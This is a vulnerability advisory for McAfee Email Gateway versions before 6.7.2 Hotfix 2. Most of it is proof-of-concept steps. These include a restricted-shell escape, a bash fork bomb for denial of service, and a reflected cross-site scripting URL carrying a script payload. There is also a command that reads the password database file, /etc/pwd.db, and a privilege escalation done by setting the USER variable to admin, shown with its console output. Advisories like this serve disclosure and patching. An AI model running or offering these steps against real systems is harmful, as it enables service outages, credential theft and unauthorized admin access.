source: https://www.securityfocus.com/bid/39242/info
McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:
A local privilege-escalation vulnerability
A denial-of-service vulnerability.
Multiple cross-site scripting vulnerabilities
An information-disclosure vulnerability
An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.
Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable.
Denial of Service:
* In order to run the DoS, follow the steps below:
[Secure Mail]: command rbash –noprofile
[Secure Mail]: :(){:|:&};:
Cross-site scripting
https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=<script>alert("XSS");</script>&QtnType=9
Information Disclosure
[Secure Mail]: command rbash –noprofile
[Secure Mail]: grep -a '.*' /etc/pwd.db
Local Privilege-Escalation:
[Secure Mail]: command rbash –noprofile
[Secure Mail]: declare -x USER="admin"
If you want to check the new privilege:
[Secure Mail]: cmd_admin set user unlock
*** Invalid command: Usage - set user unlock <USER ID> ***
[Secure Mail]: cmd_admin set user unlock admin
Cannot unlock yourself.
[Secure Mail]: exi
